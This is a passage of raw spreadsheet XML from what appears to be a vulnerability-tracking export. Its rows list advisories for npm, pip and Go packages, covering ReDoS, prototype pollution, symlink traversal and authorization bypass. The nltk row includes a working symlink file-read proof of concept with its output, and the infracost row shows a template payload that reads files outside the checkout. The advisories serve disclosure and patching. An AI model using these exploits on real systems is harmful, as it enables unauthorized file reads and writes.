Reachable through `colord()` and `getFormat()`, and through any method that accepts a color string — including `isEqual()`, `mix()` and `contrast()`. The affected matchers are `parseRgbaString` and `parseHslaString` (built in) and `parseHwbaString`, `parseLchaString`, `parseCmykaString` (plugins).

Growth is polynomial, not exponential — multi-kilobyte payloads are required for a noticeable stall.

### Who is affected

Applications that pass attacker-controlled strings of unbounded length to `colord()` — for example a server validating a color taken from a request body, JSON field, or uploaded stylesheet. `colord` applies no length limit before matching.

Typical client-side use with short input is not meaningfully affected.

### Patches

Fixed in **2.9.4**. The number is now written as `([+-]?(?:\d*\.\d+|\d+))`, which accepts exactly the same syntax but leaves only one way to match it, making rejection linear — 1 MB of input is rejected in ~5 ms.

### Workarounds

Reject or truncate color strings longer than a sane limit (e.g. 100 characters) before passing them to `colord`.</t></is></c><c r="S65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D66" s="5" t="n"><v>6.9</v></c><c r="E66" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.003</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M66" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N66" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O66" s="5" t="inlineStr" /><c r="P66" s="5" t="inlineStr" /><c r="Q66" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R66" s="5" t="inlineStr"><is><t>### Impact
With columns: true and group_columns_by_name: true, a duplicated __proto__  header causes the duplicate-column branch to assign an array to obj['__proto__'], invoking the __proto__ setter and replacing the parsed record object's prototype with attacker-controlled data. Fixed in 7.0.2 (Object.hasOwn duplicate check + Object.defineProperty assignment).

### Patches
The problem been patched.

### Workarounds
Disable usage of both the columns and  group_columns_by_name options.

### References
issue #496, PR #497</t></is></c><c r="S66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>GHSA-3mcp-22mf-vrw3</t></is></c><c r="D67" s="5" t="n"><v>6.9</v></c><c r="E67" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="inlineStr" /><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr"><is><t>npm:axios</t></is></c><c r="M67" s="5" t="inlineStr" /><c r="N67" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O67" s="5" t="inlineStr" /><c r="P67" s="5" t="inlineStr" /><c r="Q67" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="R67" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hcpx-6fm6-wx23. This link is maintained to preserve external references.

## Original Description
axios before 0.33.0 contains an incomplete depth-limit bypass in toFormData.js when serializing objects with top-level keys ending in '{}'. Attackers who control object keys and nested values passed to axios form or parameter serialization can trigger a RangeError from JSON.stringify, causing denial of service in the affected request path.</t></is></c><c r="S67" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-3mcp-22mf-vrw3</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>GHSA-mxjf-vfmv-qfm6</t></is></c><c r="D68" s="5" t="n"><v>6.9</v></c><c r="E68" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="inlineStr" /><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr" /><c r="K68" s="5" t="inlineStr" /><c r="L68" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M68" s="5" t="inlineStr" /><c r="N68" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O68" s="5" t="inlineStr" /><c r="P68" s="5" t="inlineStr" /><c r="Q68" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R68" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-74pj-6g7r-j55c. This link is maintained to preserve external references.

## Original Description
SiYuan before v3.7.4 contains an information disclosure vulnerability in the /api/notebook/getNotebookInfo endpoint that returns notebook metadata without authorization checks. Attackers can read notebook names, document counts, sizes, and timestamps for closed or non-published notebooks that should be hidden from readers.</t></is></c><c r="S68" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-mxjf-vfmv-qfm6</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D69" s="5" t="n"><v>6.8</v></c><c r="E69" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.002</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M69" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N69" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O69" s="5" t="inlineStr" /><c r="P69" s="5" t="inlineStr" /><c r="Q69" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R69" s="5" t="inlineStr"><is><t>## Summary

`IPIPANCorpusReader` (`nltk/corpus/reader/ipipan.py`) exposes public methods, `channels()`, `domains()`, `categories()`, and `fileids(channels=...)`, that accept a caller supplied `fileids` list and read a file via a completely unprotected builtin `open()` call, with no `nltk.pathsec` involvement at all. A symlink placed inside the corpus root, with a name containing no separators or `..`, passes NLTK's existing traversal checks and is opened directly, reading a file from anywhere on the filesystem the process can access.

## Root cause

All four methods route through `_get_tag()`:

```python
def _get_tag(self, f, tag):
    tags = []
    with open(f) as infile:   # builtin open(), no pathsec involvement
        header = infile.read()
    ...
```

`f` arrives via `_list_header_files()` / `_list_morph_files_by()`, both of which call:

```python
f.replace("morph.xml", "header.xml")
```

on the result of `self.abspath(...)` or `self.abspaths(...)`. `FileSystemPathPointer` subclasses `str`, so `.replace()` returns a plain Python string, silently discarding the `PathPointer` wrapper. That plain string is handed straight to builtin `open()`.

This is a more severe variant of the same CWE-59 class already fixed elsewhere in this codebase (`CorpusReader.open()`, `NKJPCorpusReader.add_root()`, and the recent `FramenetCorpusReader` fix): those route file access through `nltk.pathsec.validate_path()`, at minimum the global, non-scoped check, before opening. Here, converting the `PathPointer` to a plain string before calling `open()` skips `pathsec` completely, not just the corpus-root-scoped check, so the symlink target does not even need to land under a registered `nltk.data.path` root.

Plain literal `../` traversal in the fileid is still blocked by `FileSystemPathPointer.join()`, so this is specifically the symlink variant, not a regression of the older, simpler traversal class.

## Proof of concept

Constructed the normal, documented way, `fileids` as a regex over file paths, so the reader auto-discovers whatever `.xml` files exist in its root with no special knowledge of the planted symlink.

```python
import os
import tempfile

from nltk.corpus.reader.ipipan import IPIPANCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "ipipan")
os.makedirs(corpus_root)

with open(os.path.join(corpus_root, "real_morph.xml"), "w") as f:
    f.write("&lt;channel&gt;legit&lt;/channel&gt;")

secret_dir = os.path.join(root, "outside_ipipan_root")
os.makedirs(secret_dir)
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write("&lt;channel&gt;TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT&lt;/channel&gt;")

os.symlink(secret_path, os.path.join(corpus_root, "evil_link.xml"))

reader = IPIPANCorpusReader(corpus_root, r".*\.xml")
print("Auto-discovered fileids:", sorted(reader.fileids()))

result = reader.channels(fileids=["evil_link.xml"])
print(result)
```

Actual output when run against current `develop`:

```
Auto-discovered fileids: ['evil_link.xml', 'real_morph.xml']
['TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT']
```

That content was read from `secret_path`, a file entirely outside `corpus_root`. No exception raised anywhere. The planted symlink even surfaces naturally in the reader's own `fileids()` listing, exactly as a real file would.

Verified separately that literal `../` traversal in the fileid is still rejected (`ValueError: Traversal blocked`), confirming this is specifically the symlink gap, not a broader regression.

## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered or shared corpus directory (`SECURITY.md` names "shared environments... multi-tenant pipelines" as the project's own stated threat model) plus a completely normal API call.
- Core corpus-reader code, reached through plain `import nltk` and documented, programmatic usage (`words()`, `sents()`, `channels()`, etc.), not a demo or GUI tool.
- Same reader category, and same CWE-59 mechanism, already treated as CVE-worthy twice in this codebase for `FramenetCorpusReader` and `NKJPCorpusReader`.
- Not a bypass of a claimed fix. `ipipan.py` has never had security hardening applied, and has no dedicated test coverage at all.

## CVSS v3.1

- **AV:L, AC:L**: exploitation is local filesystem symlink placement, then immediate and deterministic once triggered.
- **PR:L**: the attacker needs some pre-existing ability to plant a symlink somewhere reachable, not zero privilege, but not elevated either.
- **UI:N**: fires during routine, automated corpus processing, no separate victim action.
- **S:U**: stays within the same process's existing privileges.
- **C:H, I:N, A:N**: arbitrary file read only, no write, no crash.

## Suggested fix

Route `_get_tag()` through `nltk.pathsec.validate_path()` with the corpus root as `required_root`, or through `CorpusReader.open()`, instead of converting the `PathPointer` to a plain string and calling builtin `open()` directly. The same fix pattern already applied to `FramenetCorpusReader` and `NKJPCorpusReader` applies directly here.</t></is></c><c r="S69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-76845</t></is></c><c r="D70" s="5" t="n"><v>6.8</v></c><c r="E70" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.001</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr" /><c r="L70" s="5" t="inlineStr"><is><t>npm:adm-zip</t></is></c><c r="M70" s="5" t="inlineStr" /><c r="N70" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O70" s="5" t="inlineStr" /><c r="P70" s="5" t="inlineStr" /><c r="Q70" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R70" s="5" t="inlineStr"><is><t>adm-zip 0.5.9 through 0.6.0 follows symbolic links at the extraction destination. Utils.sanitize in util/utils.js enforces containment by comparing only the string form of an archive entry name against the resolved extraction root, and Utils.writeFileTo opens the computed destination with fs.openSync(path, "w", 0o666), which resolves symbolic links and carries neither O_NOFOLLOW nor a pre-write fs.lstatSync check. When a path component at the destination already exists as a symbolic link pointing outside the extraction root, extractAllTo, extractAllToAsync and extractEntryTo write the entry contents through that link and then chmod its target, placing attacker-controlled content in a file outside the root without any traversal sequence appearing in the archive. Reaching the write requires overwrite to be enabled, because the preceding fs.existsSync check also resolves the link and otherwise declines. An attacker able to create a symbolic link inside a shared, reused or predictable extraction directory, such as a temporary directory or a continuous integration workspace, can overwrite any file the extracting process is permitted to write.</t></is></c><c r="S70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76845</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>GHSA-486p-g8x4-77mg</t></is></c><c r="D71" s="5" t="n"><v>6.8</v></c><c r="E71" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="inlineStr" /><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr" /><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr"><is><t>pip:onnx</t></is></c><c r="M71" s="5" t="inlineStr" /><c r="N71" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O71" s="5" t="inlineStr" /><c r="P71" s="5" t="inlineStr" /><c r="Q71" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R71" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-q56x-g2fj-4rj6. This link is maintained to preserve external references.

## Original Description
In ONNX before 1.21.0, the 'save_external_data' function builds the external-data file path from the model's external_data location field and opens it for writing without 'O_NOFOLLOW/O_EXCL', after a non-atomic 'os.path.isfile()' check. A local attacker with write access to the directory where a victim serializes external data can deterministically pre-plant a symlink that is being followed, causing the victim's write to append to any file the victim can write, e.g. ~/.ssh/authorized_keys, cron files, or application configs. Fixed in 1.21.0.</t></is></c><c r="S71" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-486p-g8x4-77mg</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-45819</t></is></c><c r="D72" s="5" t="n"><v>6.6</v></c><c r="E72" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.004</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr" /><c r="K72" s="5" t="inlineStr" /><c r="L72" s="5" t="inlineStr"><is><t>npm:baseline-browser-mapping</t></is></c><c r="M72" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N72" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O72" s="5" t="inlineStr" /><c r="P72" s="5" t="inlineStr" /><c r="Q72" s="5" t="inlineStr"><is><t>CWE-705</t></is></c><c r="R72" s="5" t="inlineStr"><is><t>baseline-browser-mapping 2.x before 2.11.0 calls process.exit() instead of throwing on invalid or conflicting input parameters, and can trigger immediate process termination, causing denial of service.</t></is></c><c r="S72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45819</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D73" s="5" t="n"><v>6.3</v></c><c r="E73" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.002</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr" /><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M73" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N73" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O73" s="5" t="inlineStr" /><c r="P73" s="5" t="inlineStr" /><c r="Q73" s="5" t="inlineStr"><is><t>CWE-400, CWE-1333</t></is></c><c r="R73" s="5" t="inlineStr"><is><t>### Summary

`Pl196xCorpusReader` still parses whole TEI blocks with multiple lazy regexes over attacker-controlled text. A malformed file with many opening tags and no matching closing tags forces repeated rescans and produces quadratic CPU growth in public reader APIs.

### Details

- **Vulnerability type:** Regular-expression denial of service
- **Affected component:** `nltk.corpus.reader.pl196x.TEICorpusView.read_block` and `Pl196xCorpusReader` public methods
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Lazy `.*?` whole-block regexes rescan untrusted XML-like blocks from each opening-tag position.

The parser uses regexes for paragraphs, sentences, and word tags across the whole `&lt;text&gt;` block. When the attacker supplies many unmatched opening tags, each attempt scans toward the end of the block and fails, then restarts from the next opening tag. There is near four-times runtime growth each time the number of malformed `&lt;p&gt;` tags doubled, through normal public calls such as `words()` and `tagged_words()`.

### PoC

**Preconditions**
- The application parses attacker-influenced PL196X or TEI-like corpus files through public reader APIs.

**Steps**
1. Create a corpus file with a valid header followed by a `&lt;text&gt;` block that contains many opening tags and no matching closing tags.
2. Instantiate `Pl196xCorpusReader` on that corpus.
3. Call `words()` or `tagged_words()` and measure elapsed time as the malformed tag count doubles.
4. Observe near quadratic growth instead of near-linear behavior.

**Minimal reproducible excerpt**

```text
size=1000 0.014s
size=2000 0.057s
size=4000 0.231s
size=8000 0.927s
```

### Impact

A consumer that accepts attacker-influenced corpus files can be forced into heavy CPU use and parser-thread stalling before the application concludes the input contains no valid content.

### Remediation

Replace the whole-block lazy-regex parser with a linear parser or bounded tokenizer, and add regression tests that assert near-linear behavior on malformed inputs with many unmatched tags.</t></is></c><c r="S73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D74" s="5" t="n"><v>6.3</v></c><c r="E74" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.003</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr"><is><t>go:google.golang.org/grpc</t></is></c><c r="M74" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N74" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O74" s="5" t="inlineStr" /><c r="P74" s="5" t="inlineStr" /><c r="Q74" s="5" t="inlineStr"><is><t>CWE-178, CWE-863</t></is></c><c r="R74" s="5" t="inlineStr"><is><t>### Summary
A vulnerability in the xDS RBAC HTTP filter implementation in grpc-go allows remote attackers to bypass authorization policies (specifically DENY rules) by using mixed-case or canonical-case header matchers (e.g., X-Role instead of x-role). Additionally, the safety guards introduced by gRFC A41 to block grpc- prefixed headers can be evaded via variations in casing (e.g., Grpc-Status).

### Impact
When an operator defines an RBAC policy referencing headers containing uppercase letters (e.g. X-Role), grpc-go fails to match incoming metadata keys because they are unconditionally lowercased. Because of this case-sensitivity mismatch, a policy designed to block requests containing specific header values fails open: the rule is evaluated as a non-match, and traffic that should have been rejected is served.

Furthermore, gRFC A41 requires rejecting configuration schemas specifying header matchers starting with grpc-. Because this check is executed case-sensitively in grpc-go, attackers can bypass the validation by specifying titles like Grpc-Status.

### Patches
The problem is fixed in `master` and in the 1.83.1 release.</t></is></c><c r="S74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D75" s="5" t="n"><v>6.3</v></c><c r="E75" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.004</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M75" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N75" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O75" s="5" t="inlineStr" /><c r="P75" s="5" t="inlineStr" /><c r="Q75" s="5" t="inlineStr"><is><t>CWE-187</t></is></c><c r="R75" s="5" t="inlineStr"><is><t>## Summary

Astro stripped a configured `base` path from request pathnames using a string-prefix check that did not verify a path-segment boundary. With `base: "/app"`, a request to `/appX/admin` was treated as being under the base and resolved internally to the `/admin` route, while middleware still observed the public pathname `/appX/admin`. Middleware that authorizes routes by inspecting `context.url.pathname` could therefore be bypassed.

## Impact

An unauthenticated remote attacker can bypass pathname-based middleware authorization in applications that:

- Configure a non-root `base`.
- Protect base-prefixed routes in middleware using `context.url.pathname`.

Because routing and middleware resolved different effective pathnames, a request such as `/appX/admin` (or other single-character extensions like `/app2/admin` or `/app-/admin`) reached the protected `/admin` route without passing the middleware check that guards `/app/admin`. Astro's authentication guide demonstrates protecting routes in middleware via `context.url.pathname`, so this is a reasonable and expected pattern.

## Affected versions

`astro` &lt;= 7.2.3.

## Patches

Fixed in `astro` 7.2.4. Base stripping now requires the pathname to equal the base without its trailing slash, or to be followed by a `/`, so a prefix that does not end on a path-segment boundary is no longer treated as being under the base. Routing and `context.url.pathname` now resolve the same pathname.

## Workarounds

Upgrade to `astro` 7.2.4 or later. As a mitigation before upgrading, avoid relying solely on prefix checks of `context.url.pathname` for authorization, or reject requests whose pathname does not begin with the configured base followed by a path-segment boundary.

## Credits

Reported by @Ryoga-exe.</t></is></c><c r="S75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D76" s="5" t="n"><v>5.9</v></c><c r="E76" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.004</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr" /><c r="L76" s="5" t="inlineStr"><is><t>go:github.com/infracost/infracost</t></is></c><c r="M76" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N76" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O76" s="5" t="inlineStr" /><c r="P76" s="5" t="inlineStr" /><c r="Q76" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R76" s="5" t="inlineStr"><is><t>### Impact

Path traversal via link following in the Infracost config-template parser. The `readFile`, `pathExists`, `isDir`, and `matchPaths` template functions confined repo-supplied paths with a lexical `filepath.Rel` check plus a leaf-only `os.Lstat`:

```
{{ readFile "evil/file" }}
```

With an intermediate directory symlink committed in the repo (`evil -&gt; /`), the path is lexically clean and the leaf is a regular file, so both checks pass, but `os.ReadFile` follows the symlink and reads outside the checkout. The contents are rendered into the generated config and surfaced via the Infracost dashboard and PR comment, so anyone who can open a pull request can read files off the runner.

Affects `infracost` up to and including `v0.10.44`. Successful exploitation reads any file the CLI process can reach on the runner. Impact depends on what the run exposes: under `on: pull_request` (the configuration in Infracost's documentation) fork pull requests run without secrets and with a read-only token, so exposure is limited. If Infracost runs under `pull_request_target`, or is triggered by a same-repository pull request, the read reaches the repository's secrets, enabling secret theft. The patch confines all four functions regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3586](https://github.com/infracost/infracost/pull/3586)) by routing all four functions through `security.IsPathAllowed`, which resolves symlinks anywhere in the path before a segment-aware containment check. The same fix landed in [config#14](https://github.com/infracost/config/pull/14) and [parser#144](https://github.com/infracost/parser/pull/144).
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: run Infracost under `on: pull_request` rather than `pull_request_target`, and keep fork pull requests from receiving secrets (the defaults).</t></is></c><c r="S76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D77" s="5" t="n"><v>5.9</v></c><c r="E77" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F77" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.004</v></c><c r="I77" s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr" /><c r="L77" s="5" t="inlineStr"><is><t>go:github.com/infracost/infracost</t></is></c><c r="M77" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N77" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O77" s="5" t="inlineStr" /><c r="P77" s="5" t="inlineStr" /><c r="Q77" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R77" s="5" t="inlineStr"><is><t>### Impact

Sensitive information exposure in the Infracost Terraform Cloud/Enterprise integration. Several code paths attached a configured secret token to a request whose host was taken straight from the scanned Terraform, with no check that the host was the trusted endpoint. 

The condition that matters is whether a Terraform Cloud/Enterprise (or registry) token is present in the run: if one is, the injected hostname can disclose it. Impact therefore depends on the trigger. Under `on: pull_request` (the only configuration in Infracost's documentation) fork pull requests run without secrets, so no token is present. It only reaches token disclosure under `pull_request_target`, a same-repository pull request, or another CI setup that provides the token alongside untrusted Terraform, and exploiting an untrusted fork pull request also typically needs a maintainer to approve the workflow run. The patch scopes the token to the trusted host regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3590](https://github.com/infracost/infracost/pull/3590)) by attaching a token only when the destination host matches the configured trusted host; otherwise Infracost refuses to send it and skips remote variable loading
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: use `on: pull_request` rather than `pull_request_target`, pin `organization`, `workspace`, and `host` in Infracost config so the `.tf` hostname is ignored, and keep Terraform Cloud and registry tokens out of runs that process untrusted pull request content.</t></is></c><c r="S77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-12208</t></is></c><c r="D78" s="5" t="n"><v>5.5</v></c><c r="E78" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F78" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.003</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" t="inlineStr" /><c r="K78" s="5" t="inlineStr" /><c r="L78" s="5" t="inlineStr"><is><t>npm:jsonata</t></is></c><c r="M78" s="5" t="inlineStr"><is><t>1.8.8, 2.2.1</t></is></c><c r="N78" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O78" s="5" t="inlineStr" /><c r="P78" s="5" t="inlineStr" /><c r="Q78" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R78" s="5" t="inlineStr"><is><t>A weakness has been identified in jsonata-js jsonata up to 2.2.0. The affected element is the function createFrame of the file src/jsonata.js of the component Function Binding Frame System. This manipulation causes improperly controlled modification of object prototype attributes. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t></is></c><c r="S78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12208</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D79" s="5" t="n"><v>5.4</v></c><c r="E79" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>NVD</t></is></c><c 